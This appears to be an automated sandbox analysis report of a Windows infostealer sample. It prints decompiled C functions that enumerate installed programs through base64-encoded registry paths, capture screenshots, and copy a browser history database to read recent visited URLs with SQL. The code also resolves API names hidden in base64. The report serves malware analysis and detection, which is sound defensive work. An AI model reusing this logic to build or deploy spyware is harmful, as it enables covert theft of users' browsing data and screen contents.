                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416daf
                                                                                                                                                                                          0x00416dba
                                                                                                                                                                                          0x00416dbd
                                                                                                                                                                                          0x00416dc4
                                                                                                                                                                                          0x00416dc7
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dd7
                                                                                                                                                                                          0x00416de0
                                                                                                                                                                                          0x00416de7
                                                                                                                                                                                          0x00416e22
                                                                                                                                                                                          0x00416e2e
                                                                                                                                                                                          0x00416e37
                                                                                                                                                                                          0x00416e3c
                                                                                                                                                                                          0x00416e42
                                                                                                                                                                                          0x00416e4f
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416df5
                                                                                                                                                                                          0x00416dfe
                                                                                                                                                                                          0x00416e03
                                                                                                                                                                                          0x00416e09
                                                                                                                                                                                          0x00416e0e
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e5e
                                                                                                                                                                                          0x00416e6d
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e87
                                                                                                                                                                                          0x00416e8c
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416e98
                                                                                                                                                                                          0x00416e9b
                                                                                                                                                                                          0x00416e9e
                                                                                                                                                                                          0x00416eae
                                                                                                                                                                                          0x00416eb6
                                                                                                                                                                                          0x00416ebe
                                                                                                                                                                                          0x00416ec9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                          • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                          • API String ID: 3877065590-4127804628
                                                                                                                                                                                          • Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
                                                                                                                                                                                          • Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00415F30, Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E00415F30(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v1009;
				char _v1016;
				intOrPtr _v1020;
				char _v1024;
				char _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				char _v1100;
				char _v1104;
				char _v1108;
				char _v1112;
				char _v1116;
				char _v1120;
				char _v1124;
				char _v1128;
				char _v1132;
				char _v1136;
				char _v1140;
				char _v1144;
				char _v1148;
				void* _t123;
				void* _t144;
				void* _t178;
				void* _t199;
				intOrPtr* _t262;
				void* _t263;
				void* _t265;
				void* _t267;
				void* _t269;
				void* _t271;
				intOrPtr _t318;
				char* _t329;
				int _t331;
				int _t332;
				intOrPtr _t334;
				intOrPtr _t335;

				_t334 = _t335;
				_t263 = 0x8f;
				do {
					_push(0);
					_push(0);
					_t263 = _t263 - 1;
				} while (_t263 != 0);
				_t262 = __eax;
				_t329 =  &_v1009;
				_push(_t334);
				_push(0x416452);
				_push( *[fs:eax]);
				 *[fs:eax] = _t335;
				E004034E4(__eax);
				_t331 = 0;
				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1016, _t329, 0);
				RegOpenKeyExA(0x80000002, E00403990(_v1016), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t331, _t329, 0x3e9) == 0) {
					E00403D2C( &_v1024,  *_t262);
					_push(_v1024);
					_push(0);
					_push( &_v1028);
					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1036, _t329, _t331);
					E00403C98( &_v1032, E00403990(_v1036));
					_push(_v1032);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1044, _t329, _t331);
					_push( &_v1044);
					E00403748( &_v1048, 0x3e9, _t329);
					_pop(_t123);
					E00403798(_t123, _v1048);
					E00403C98( &_v1040, E00403990(_v1044));
					_pop(_t265);
					E00407500(0x80000002, _t262, _t265, _v1040);
					_push(_v1028);
					_push(0x416528);
					_push(0);
					_push( &_v1052);
					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1060, _t329, _t331);
					E00403C98( &_v1056, E00403990(_v1060));
					_push(_v1056);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1068, _t329, _t331);
					_push( &_v1068);
					E00403748( &_v1072, 0x3e9, _t329);
					_pop(_t144);
					E00403798(_t144, _v1072);
					E00403C98( &_v1064, E00403990(_v1068));
					_pop(_t267);
					E00407500(0x80000002, _t262, _t267, _v1064);
					_push(_v1052);
					_push(")");
					E00403E1C();
					E0040377C(_t262, _v1020);
					_t331 = _t331 + 1;
				}
				_t332 = 0;
				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1076, _t329, 0);
				RegOpenKeyExA(0x80000001, E00403990(_v1076), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t332, _t329, 0x3e9) == 0) {
					E00403D2C( &_v1084,  *_t262);
					_push(_v1084);
					_push(0);
					_push( &_v1088);
					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1096, _t329, _t332);
					E00403C98( &_v1092, E00403990(_v1096));
					_push(_v1092);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1104, _t329, _t332);
					_push( &_v1104);
					E00403748( &_v1108, 0x3e9, _t329);
					_pop(_t178);
					E00403798(_t178, _v1108);
					E00403C98( &_v1100, E00403990(_v1104));
					_pop(_t269);
					E00407500(0x80000001, _t262, _t269, _v1100);
					_push(_v1088);
					_push(0x416528);
					_push(0);
					_push( &_v1112);
					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1120, _t329, _t332);
					E00403C98( &_v1116, E00403990(_v1120));
					_push(_v1116);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1128, _t329, _t332);
					_push( &_v1128);
					E00403748( &_v1132, 0x3e9, _t329);
					_pop(_t199);
					E00403798(_t199, _v1132);
					E00403C98( &_v1124, E00403990(_v1128));
					_pop(_t271);
					E00407500(0x80000001, _t262, _t271, _v1124);
					_push(_v1112);
					_push(")");
					E00403E1C();
					E0040377C(_t262, _v1080);
					_t332 = _t332 + 1;
				}
				E00403D2C( &_v1140,  *_t262);
				E004070BC(_v1140, _t262, 0x41655c, L"()\r\n",  &_v1136);
				E0040377C(_t262, _v1136);
				E00403D2C( &_v1148,  *_t262);
				E004070BC(_v1148, _t262, 0x41655c, L"\r\n\r\n",  &_v1144);
				E0040377C(_t262, _v1144);
				_pop(_t318);
				 *[fs:eax] = _t318;
				_push(E0041645C);
				E00403B98( &_v1148, 4);
				E00403508( &_v1132, 2);
				E00403B80( &_v1124);
				E004034E4( &_v1120);
				E00403B98( &_v1116, 2);
				E00403508( &_v1108, 2);
				E00403B80( &_v1100);
				E004034E4( &_v1096);
				E00403B98( &_v1092, 4);
				E00403508( &_v1076, 3);
				E00403B80( &_v1064);
				E004034E4( &_v1060);
				E00403B98( &_v1056, 2);
				E00403508( &_v1048, 2);
				E00403B80( &_v1040);
				E004034E4( &_v1036);
				E00403B98( &_v1032, 4);
				return E004034E4( &_v1016);
			}























































                                                                                                                                                                                          0x00415f31
                                                                                                                                                                                          0x00415f33
                                                                                                                                                                                          0x00415f38
                                                                                                                                                                                          0x00415f38
                                                                                                                                                                                          0x00415f3a
                                                                                                                                                                                          0x00415f3c
                                                                                                                                                                                          0x00415f3c
                                                                                                                                                                                          0x00415f42
                                                                                                                                                                                          0x00415f44
                                                                                                                                                                                          0x00415f4c
                                                                                                                                                                                          0x00415f4d
                                                                                                                                                                                          0x00415f52
                                                                                                                                                                                          0x00415f55
                                                                                                                                                                                          0x00415f5a
                                                                                                                                                                                          0x00415f5f
                                                                                                                                                                                          0x00415f77
                                                                                                                                                                                          0x00415f8d
                                                                                                                                                                                          0x0041610a
                                                                                                                                                                                          0x00415f9f
                                                                                                                                                                                          0x00415fa4
                                                                                                                                                                                          0x00415faa
                                                                                                                                                                                          0x00415fb2
                                                                                                                                                                                          0x00415fbe
                                                                                                                                                                                          0x00415fd6
                                                                                                                                                                                          0x00415fe1
                                                                                                                                                                                          0x00415fed
                                                                                                                                                                                          0x00415ff8
                                                                                                                                                                                          0x00416006
                                                                                                                                                                                          0x00416011
                                                                                                                                                                                          0x00416012
                                                                                                                                                                                          0x0041602a
                                                                                                                                                                                          0x0041603a
                                                                                                                                                                                          0x0041603b
                                                                                                                                                                                          0x00416040
                                                                                                                                                                                          0x00416046
                                                                                                                                                                                          0x0041604b
                                                                                                                                                                                          0x00416053
                                                                                                                                                                                          0x0041605f
                                                                                                                                                                                          0x00416077
                                                                                                                                                                                          0x00416082
                                                                                                                                                                                          0x0041608e
                                                                                                                                                                                          0x00416099
                                                                                                                                                                                          0x004160a7
                                                                                                                                                                                          0x004160b2
                                                                                                                                                                                          0x004160b3
                                                                                                                                                                                          0x004160cb
                                                                                                                                                                                          0x004160db
                                                                                                                                                                                          0x004160dc
                                                                                                                                                                                          0x004160e1
                                                                                                                                                                                          0x004160e7
                                                                                                                                                                                          0x004160f7
                                                                                                                                                                                          0x00416104
                                                                                                                                                                                          0x00416109
                                                                                                                                                                                          0x00416109
                                                                                                                                                                                          0x00416122
                                                                                                                                                                                          0x0041613a
                                                                                                                                                                                          0x00416150
                                                                                                                                                                                          0x004162cd
                                                                                                                                                                                          0x00416162
                                                                                                                                                                                          0x00416167
                                                                                                                                                                                          0x0041616d
                                                                                                                                                                                          0x00416175
                                                                                                                                                                                          0x00416181
                                                                                                                                                                                          0x00416199
                                                                                                                                                                                          0x004161a4
                                                                                                                                                                                          0x004161b0
                                                                                                                                                                                          0x004161bb
                                                                                                                                                                                          0x004161c9
                                                                                                                                                                                          0x004161d4
                                                                                                                                                                                          0x004161d5
                                                                                                                                                                                          0x004161ed
                                                                                                                                                                                          0x004161fd
                                                                                                                                                                                          0x004161fe
                                                                                                                                                                                          0x00416203
                                                                                                                                                                                          0x00416209
                                                                                                                                                                                          0x0041620e
                                                                                                                                                                                          0x00416216
                                                                                                                                                                                          0x00416222
                                                                                                                                                                                          0x0041623a
                                                                                                                                                                                          0x00416245
                                                                                                                                                                                          0x00416251
                                                                                                                                                                                          0x0041625c
                                                                                                                                                                                          0x0041626a
                                                                                                                                                                                          0x00416275
                                                                                                                                                                                          0x00416276
                                                                                                                                                                                          0x0041628e
                                                                                                                                                                                          0x0041629e
                                                                                                                                                                                          0x0041629f
                                                                                                                                                                                          0x004162a4
                                                                                                                                                                                          0x004162aa
                                                                                                                                                                                          0x004162ba
                                                                                                                                                                                          0x004162c7
                                                                                                                                                                                          0x004162cc
                                                                                                                                                                                          0x004162cc
                                                                                                                                                                                          0x004162f4
                                                                                                                                                                                          0x00416309
                                                                                                                                                                                          0x00416316
                                                                                                                                                                                          0x0041632a
                                                                                                                                                                                          0x0041633f
                                                                                                                                                                                          0x0041634c
                                                                                                                                                                                          0x00416353
                                                                                                                                                                                          0x00416356
                                                                                                                                                                                          0x00416359
                                                                                                                                                                                          0x00416369
                                                                                                                                                                                          0x00416379
                                                                                                                                                                                          0x00416384
                                                                                                                                                                                          0x0041638f
                                                                                                                                                                                          0x0041639f
                                                                                                                                                                                          0x004163af
                                                                                                                                                                                          0x004163ba
                                                                                                                                                                                          0x004163c5
                                                                                                                                                                                          0x004163d5
                                                                                                                                                                                          0x004163e5
                                                                                                                                                                                          0x004163f0
                                                                                                                                                                                          0x004163fb
                                                                                                                                                                                          0x0041640b
                                                                                                                                                                                          0x0041641b
                                                                                                                                                                                          0x00416426
                                                                                                                                                                                          0x00416431
                                                                                                                                                                                          0x00416441
                                                                                                                                                                                          0x00416451

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                            • Part of subcall function 00407500: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                                                                                                            • Part of subcall function 00407500: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open$EnumFreeString$QueryValue
                                                                                                                                                                                          • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                                                                                                                                                                                          • API String ID: 811798878-3013244427
                                                                                                                                                                                          • Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                                                                                                          • Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
                                                                                                                                                                                          • Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004178B4, Relevance: 15.2, APIs: 10, Instructions: 162windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                          			E004178B4(int __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, int _a16) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _v32;
				struct HWND__* _v48;
				struct HWND__* _v52;
				struct HWND__* _v56;
				char _v60;
				intOrPtr _v124;
				char _v132;
				char _v148;
				char* _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				void* _v176;
				char _v180;
				intOrPtr* _t78;
				struct HDC__* _t100;
				intOrPtr _t107;
				void* _t112;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t118;
				void* _t121;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t121);
				_push(0x417adb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121 + 0xffffff50;
				if( *0x41c868 != 0 &&  *0x41c86c != 0 &&  *0x41c870 != 0 &&  *0x41c874 != 0 &&  *0x41c878 != 0 &&  *0x41c87c != 0 &&  *0x41c880 != 0 &&  *0x41c884 != 0 &&  *0x41c888 != 0 &&  *0x41c88c != 0) {
					_v60 = 1;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_push(0);
					_push( &_v60);
					_push( &_v20);
					if( *0x41c86c() == 0) {
						_t100 = GetDC(0);
						_t116 = CreateCompatibleDC(0);
						_t112 = CreateCompatibleBitmap(_t100, _v8, _v12);
						SelectObject(_t116, _t112);
						BitBlt(_t116, 0, 0, _v8, _v12, _t100, _v16, _a16, 0xcc0020);
						 *0x41c888(0, 0xffffffff, E00404900( &_v28));
						 *0x41c874(_t112, 0,  &_v24);
						E004177E0(_a8, _t100,  &_v148, _t112, _t116);
						_v180 = 1;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = _t112;
						_t118 = _t116;
						_v160 = 1;
						_v156 = 4;
						_v152 =  &_a12;
						 *0x41c884(_v24, _v28,  &_v148,  &_v180);
						_t78 = _v28;
						 *((intOrPtr*)( *_t78 + 0x30))(_t78,  &_v132, 1);
						 *0x41c88c(_v28,  &_v32);
						GlobalFix(_v32);
						E004035D4(_a4, _v124, _v32);
						 *0x41c880(_v24);
						GlobalUnWire(_v32);
						DeleteObject(_t114);
						DeleteDC(_t118);
						ReleaseDC(0, _t100);
						 *0x41c870(_v20);
					}
				}
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E00417AE2);
				return E00404900( &_v28);
			}






























                                                                                                                                                                                          0x004178c2
                                                                                                                                                                                          0x004178c5
                                                                                                                                                                                          0x004178c8
                                                                                                                                                                                          0x004178cb
                                                                                                                                                                                          0x004178d0
                                                                                                                                                                                          0x004178d1
                                                                                                                                                                                          0x004178d6
                                                                                                                                                                                          0x004178d9
                                                                                                                                                                                          0x004178e3
                                                                                                                                                                                          0x0041795e
                                                                                                                                                                                          0x00417965
                                                                                                                                                                                          0x0041796c
                                                                                                                                                                                          0x00417973
                                                                                                                                                                                          0x0041797a
                                                                                                                                                                                          0x0041797f
                                                                                                                                                                                          0x00417983
                                                                                                                                                                                          0x0041798c
                                                                                                                                                                                          0x00417999
                                                                                                                                                                                          0x004179a2
                                                                                                                                                                                          0x004179b2
                                                                                                                                                                                          0x004179b6
                                                                                                                                                                                          0x004179d6
                                                                                                                                                                                          0x004179e8
                                                                                                                                                                                          0x004179f5
                                                                                                                                                                                          0x00417a04
                                                                                                                                                                                          0x00417a09
                                                                                                                                                                                          0x00417a20
                                                                                                                                                                                          0x00417a21
                                                                                                                                                                                          0x00417a22
                                                                                                                                                                                          0x00417a23
                                                                                                                                                                                          0x00417a24
                                                                                                                                                                                          0x00417a25
                                                                                                                                                                                          0x00417a26
                                                                                                                                                                                          0x00417a30
                                                                                                                                                                                          0x00417a3d
                                                                                                                                                                                          0x00417a59
                                                                                                                                                                                          0x00417a65
                                                                                                                                                                                          0x00417a6b
                                                                                                                                                                                          0x00417a76
                                                                                                                                                                                          0x00417a80
                                                                                                                                                                                          0x00417a8f
                                                                                                                                                                                          0x00417a98
                                                                                                                                                                                          0x00417aa2
                                                                                                                                                                                          0x00417aa8
                                                                                                                                                                                          0x00417aae
                                                                                                                                                                                          0x00417ab6
                                                                                                                                                                                          0x00417abf
                                                                                                                                                                                          0x00417abf
                                                                                                                                                                                          0x0041798c
                                                                                                                                                                                          0x00417ac7
                                                                                                                                                                                          0x00417aca
                                                                                                                                                                                          0x00417acd
                                                                                                                                                                                          0x00417ada

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00417994
                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0041799D
                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004179B6
                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
                                                                                                                                                                                          • GlobalFix.KERNEL32 ref: 00417A80
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(?), ref: 00417AA2
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00417AA8
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00417AAE
                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00417AB6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 914135935-0
                                                                                                                                                                                          • Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                                                                                                                                          • Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004129A4, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                          			E004129A4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				long _t73;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				_t3 =  &_v8; // 0x6f747365
				E004040F4(_t3);
				_push(_t217);
				_push(0x412c71);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t4 =  &_v28; // 0x6f747351
				E00403B80(_t4);
				_push(_t217);
				_push(0x412be7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t73 = GetTickCount();
				_t5 =  &_v60; // 0x6f747331
				E00406FDC(_t73, __ebx, _t5, __esi, _t223);
				_push(_v60);
				_t7 =  &_v64; // 0x6f74732d
				E00406F1C(_t7, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E1C();
				_t10 =  &_v40; // 0x6f747345
				E0040781C(_v8, _t177, _t10, _t223);
				_t12 =  &_v72; // 0x6f747325
				E004062D8(L"%TEMP%", _t12, _t223);
				_push(_v72);
				_push(0x412ca8);
				_push(_v32);
				E00403E1C();
				_t17 =  &_v44; // 0x6f747341
				E0040781C(_v68, _t177, _t17, _t223);
				_t86 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
				_t20 =  &_v76; // 0x6f747321
				E0040377C(_t20, _v44);
				_t23 =  &_v36; // 0x6f747349
				E00404AFC(_v76, _t177, _t178, _t23, _t215, _t223);
				_t24 =  &_v80; // 0x6f74731d
				E00403D2C(_t24, _v36);
				if(E004076B0(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b55c; // 0x41c784
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b5cc; // 0x41c78c
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b600; // 0x41c790
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b588; // 0x41c794
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b588; // 0x41c794
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b588; // 0x41c794
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(E00412D70);
								E00403D2C( &_v84, _v48);
								_push(_v84);
								_push(0x412d78);
								E00403D2C( &_v88, _v52);
								_push(_v88);
								_push(0x412d84);
								E00403D2C( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
							}
						}
					}
					L9:
					_t105 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412C78);
				_t58 =  &_v92; // 0x6f747311
				E00403B98(_t58, 4);
				_t59 =  &_v76; // 0x6f747321
				E004034E4(_t59);
				_t60 =  &_v72; // 0x6f747325
				E00403B98(_t60, 4);
				_t61 =  &_v56; // 0x6f747335
				E00403508(_t61, 3);
				_t62 =  &_v44; // 0x6f747341
				E00403B98(_t62, 2);
				_t63 =  &_v36; // 0x6f747349
				E004034E4(_t63);
				_t64 =  &_v32; // 0x6f74734d
				E00403B98(_t64, 2);
				_t65 =  &_v8; // 0x6f747365
				return E00403B80(_t65);
			}















































                                                                                                                                                                                          0x004129a4
                                                                                                                                                                                          0x004129a4
                                                                                                                                                                                          0x004129a5
                                                                                                                                                                                          0x004129a7
                                                                                                                                                                                          0x004129ac
                                                                                                                                                                                          0x004129ac
                                                                                                                                                                                          0x004129ae
                                                                                                                                                                                          0x004129b0
                                                                                                                                                                                          0x004129b0
                                                                                                                                                                                          0x004129b0
                                                                                                                                                                                          0x004129b3
